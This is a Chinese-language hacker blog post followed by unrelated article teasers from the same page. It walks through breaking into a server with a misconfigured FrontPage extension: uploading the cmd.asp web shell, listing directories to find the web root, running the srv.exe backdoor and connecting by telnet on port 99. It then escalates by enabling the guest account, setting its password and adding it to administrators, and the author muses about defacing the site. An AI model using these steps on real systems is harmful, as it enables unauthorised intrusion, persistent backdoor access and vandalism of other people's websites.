晚上从网上下来,喝了杯咖啡。。。。倒,惨了。忘了咖啡是提神用的,这下好了。。睡不下了,只好开启pc,连上肉鸡看看扫到了些什么了, 结果:一大堆的sql弱口令和大堆的U,,看看有什麽好玩的。。。。。。。。。“某某 *** 网站”,好,就这个。看看,原来是Frontpage无权限设置啊,我喜欢,,西西。。。连上肉鸡。。取出珍藏的cmd.asp,吹吹上面的灰尘,咳咳咳。。。 说说这个漏洞的来历吧,office中的acces类型的数据库上传到服务器上,运行的话,需要服务器上有Frontpage扩展支持。才可以运行,包括Frontpage的计数器等等一些功能都需要着扩展的支持。而其中一项就是可以远程管理网页目录的功能,这项功能在安装Frontpage扩展后也就是自动运行了,但似乎不会提醒管理员添加密码(知道的那位大虾后面帖一下),所以这个漏洞纯粹是配置不当造成的。 肉鸡上:打开‘ *** 邻居’-‘添加网上邻居’-输入ip(格式http://ip)-next下去。 出来了,欢呼吧!!这就是对方的首页文件夹了,看到里面的文件了吗?(没看到?那不关我的事,这应该是属于眼科医生的任务)然后把cmd.asp拷贝到该web文件夹中。打开ie输http://ip/cmd.asp。ok出现指令运行框了。那个run就是运行的意思(台下一大堆烂茄子飞了上来。。。。噼哩啪啦。。) 输入:dir c:\index.* /s 确定对方主页的目录 驱动器 C 中的卷没有标签。 卷的序列号是 702C-518C c:\Program Files\Microsoft SQL Server\80\Tools\HTML 的目录 2000-04-28 00:33 96 index.gif 1 个文件 96 字节 c:\WINNT\amcdl\cache 的目录 2002-04-19 15:43 149 index.chc 1 个文件 149 字节 c:\WINNT\Cookies 的目录 2001-10-09 10:35 32768 index.dat 1 个文件 32768 字节 c:\WINNT\Help\iisHelp\iis\misc 的目录 1999-12-16 16:44 2564 index.asp 1999-11-04 16:45 951 index.gif 1999-12-16 16:44 1230 index.htm 3 个文件 4745 字节 c:\WINNT\History\History.IE5 的目录 2001-10-09 10:35 49152 index.dat 1 个文件 49152 字节 c:\WINNT\Temporary Internet Files\Content.IE5 的目录 2001-10-09 10:43 180224 index.dat 1 个文件 180224 字节 列出所有文件: 8 个文件 267134 字节 0 个目录 2757844992 可用字节 看看,到他首页,看到它的首页文件名为index.swf看来不是这里。。看看其他的盘。。 dir d:\index.* /s d:\nei 的目录 2002-04-28 09:33 6189 index.htm 1 个文件 6189 字节 d:\wai 的目录 2002-03-19 10:40 913 index.htm 1 个文件 913 字节 d:\wai\asp 的目录 2002-04-18 14:56 20242 index.html 1 个文件 20242 字节 d:\wai\asp\admin 的目录 2001-05-20 18:12 391 index.asp 1 个文件 391 字节 d:\xxssj 的目录 2002-04-22 14:37 2490 index.asp 1 个文件 2490 字节 d:\xxssj\swf 的目录 2002-04-22 14:37 32102 index.swf 1 个文件 32102 字节 d:\xxssj\swf\_vti_cnf 的目录 2002-04-16 15:27 221 index.swf 1 个文件 221 字节 d:\xxssj\_vti_cnf 的目录 2002-04-22 14:37 1133 index.asp 1 个文件 1133 字节 列出所有文件: 8 个文件 63681 字节 0 个目录 10368991232 可用字节 看到了吗?红色的就是首页目录和首页文件了,d:\xxssj和index.swfok!拷贝srv.exe复制到刚才那个web文件夹中。然后在命令运行框中打入 d:\xxssj\srv.exe (这里要注意的是,当你打完命令后按下回车,ie进度条在动的时候就可以telnet ip 99了) 然后:net user guest /active:yes (解禁guest ) net user guest 1314 (设置guest的密码1314) net localgroup administrators guest /add (将guest加入到admin组) ok现在已经取得了admin了。接下来该干什麽呢?换它的首页???还是… |
支付宝是如何抵挡住黑客的进攻的? 第一:因为牵扯到用户资金安全,支付宝对网络安全异常重视。在网络安全部门,大部分工作人员都有过“灰色经历”,即做过黑客。马云每次都在说,支付宝做的事情很简单,只是把银行...
高德地图、百度地图和腾讯地图,不论是开车导航还是查询路线,都会经常使用。三款地图都是免费地图,因此大家也很乐意使用。由于高德地图起步很早,优化的也不错,很多用户都会有限考虑使用高德地图。那么这些免费的...
帝都最近两天的气温已经爆表,提前达到“我和烤肉之间只差一撮孜然”的状态。公司的同学们每天都在臆想:碧海蓝天银滩,一个猛子扎进海里,游上一番,凉快! 资本家老板昨天说已经感受到大家对于海边的向往,...
编辑导语:我们在打开一个刚下载好的软件可能注册时,总会碰着一种环境,勾选“用户处事协议”,大部门用户是没有阅读就点了同意;本文作者就此环境举办了阐明,我们一起来看一下。 APP UI布局系列文章良久...
近期,拼多多平台与国美电器另外“官方宣布”,将结为发展战略合作方,进行深层协作。因为俩家公司的控股股东都姓黄,这次协作也被称作“双黄连口服液”。现阶段,彼此已在资产和业务流程方面进行协作。 ...
朝花夕拾读后感初中(朝花夕拾读后感) 今天小编给大家带来了七年级必读书朝花夕拾的读后感,供大家参考 鲁迅的《朝花夕拾》是一本需要慢慢品味才能知作者心的书,我读了很多遍,直到今天合上书本,才终于对其...